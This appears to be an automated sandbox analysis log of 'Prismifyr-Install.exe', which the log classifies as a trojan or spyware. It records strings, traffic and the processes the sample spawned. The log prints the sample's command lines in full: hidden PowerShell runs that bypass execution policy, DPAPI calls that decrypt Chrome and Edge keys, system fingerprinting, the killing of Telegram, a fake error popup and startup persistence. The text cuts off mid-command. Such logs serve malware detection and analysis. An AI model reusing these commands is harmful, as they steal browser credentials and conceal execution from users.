      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDash
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-OctalDigit
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Pattern
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-PatternCharacter
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Quantifier
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-QuantifierPrefix
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-RegExpUnicodeEscapeSequence
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-SyntaxCharacter
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Assertion
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-AtomEscape
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-CharacterEscape
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassControlLetter
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassEscape
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedAtom
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedPatternCharacter
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-IdentityEscape
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-InvalidBracedQuantifier
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-LegacyOctalEscapeSequence
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Term
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-atomescape
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-term
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.iana.org/assignments/tls-extensiontype-values
      Source: Prismifyr-Install.exe, 00000000.00000000.67528720571.00007FF7E3ACB000.00000002.00000001.01000000.00000003.sdmp, Prismifyr-Install.exe, 00000000.00000003.67535111592.0000024BF8180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: cmd.exeProcess created: 67
      Source: Prismifyr-Install.exe, 00000000.00000000.67531787349.00007FF7E4D8A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenode.exe* vs Prismifyr-Install.exe
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
      Source: powershell.exe, 00000004.00000002.67567386015.0000026AE2F99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBp
      Source: classification engineClassification label: mal72.troj.adwa.spyw.expl.evad.winEXE@148/106@3/3
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Vortex_CookiesJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2688:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:304:WilStaging_02
      Source: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2688:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6004:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6004:120:WilError_03
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeFile created: C:\Users\user\AppData\Local\Temp\pkgJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\202491-1172-1ubrsvu.jrfa.png" "
      Source: Prismifyr-Install.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Telegram.exe")
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "Telegram.exe")
      Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeFile read: C:\Users\user\Desktop\Prismifyr-Install.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Prismifyr-Install.exe "C:\Users\user\Desktop\Prismifyr-Install.exe"
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1""
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\8XTZx.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1d1qdkxo\1d1qdkxo.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5D70.tmp" "c:\Users\user\AppData\Local\Temp\1d1qdkxo\CSC52BD52076B74273B09B644FAD90AB4F.TMP"
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://api.ipify.org/ --ssl-no-revoke
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic bios get smbiosbiosversion
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic MemoryChip get /format:list
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "Speed"
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /fo csv"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /fo csv
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe "Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty SerialNumber""
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty SerialNumber"
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'CurrentUser')"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,70,116), $null, 'CurrentUser')
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,238,165,129,143,118,17,73,148,160,219,35,119,36,236,195,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,114,48,216,23,247,65,248,72,100,130,9,219,134,254,84,18,107,164,226,163,43,87,125,52,191,240,241,121,131,235,218,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,224,87,59,108,243,241,131,144,247,29,74,239,244,87,142,220,207,13,160,113,53,133,16,157,215,235,117,188,204,140,120,98,48,0,0,0,235,75,37,254,146,41,85,133,39,254,145,97,90,225,234,59,7,139,202,215,42,131,194,189,249,170,75,32,209,29,114,59,254,150,223,30,79,234,135,238,24,207,224,182,79,115,174,112,64,0,0,0,24,20,226,74,122,126,191,107,230,158,61,85,154,10,102,70,91,12,253,79,94,192,17,255,165,216,12,239,131,138,65,20,24,71,145,99,8,244,147,146,205,194,105,171,210,214,121,132,167,177,83,117,193,131,170,21,188,247,10,130,112,109,234,10), $null, 'CurrentUser')
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Telegram.exe /F"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Telegram.exe /F
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.bat" "C:\Users\user\AppData\Local\Temp\202491-1172-1ubrsvu.jrfa.png" "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT"
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2DC.tmp" "c:\Users\user\AppData\Local\Temp\screenCapture\CSC4B6917784BAC4B77A38513830EABEA.TMP"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe screenCapture_1.3.2.exe "C:\Users\user\AppData\Local\Temp\202491-1172-1ubrsvu.jrfa.png"
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()""
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exe"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\vi0IK.ps1""
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\Epic Games\vi0IK.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mydyhibp.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES25A2.tmp" "c:\Users\user\AppData\Local\Temp\CSCDBB13EE0A1FC4822925E9A81EA23E611.TMP"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://api.ipify.org/ --ssl-no-revoke
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic bios get smbiosbiosversion
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic MemoryChip get /format:list
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i "Speed"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist /fo csv"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /fo csv
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe "Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty SerialNumber""
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty SerialNumber"
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr-Install.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,58,191,23,156,155,190,129,64,149,138,58,204,106,21,93,128,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,158,216,160,155,71,150,161,140,235,194,244,159,203,38,103,42,177,143,229,191,164,155,210,123,234,21,195,11,224,12,237,78,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,215,49,197,181,72,227,196,181,37,169,138,139,47,57,31,78,97,239,161,240,18,47,110,119,132,178,134,149,164,43,5,48,0,0,0,146,52,103,242,198,28,44,32,12,252,157,63,10,75,202,239,143,18,205,151,232,185,211,51,232,89,122,202,158,188,117,227,76,233,202,45,129,32,140,198,215,239,226,206,172,246,221,60,64,0,0,0,153,187,114,159,254,24,39,207,127,235,243,169,142,141,246,185,182,44,170,244,196,65,82,59,16,103,98,92,97,151,28,253,101,220,115,212,47,120,18,125,156,32,17,123,177,29,8,158,250,170,174,124,95,6,8,229,11,233,4,171,209,80,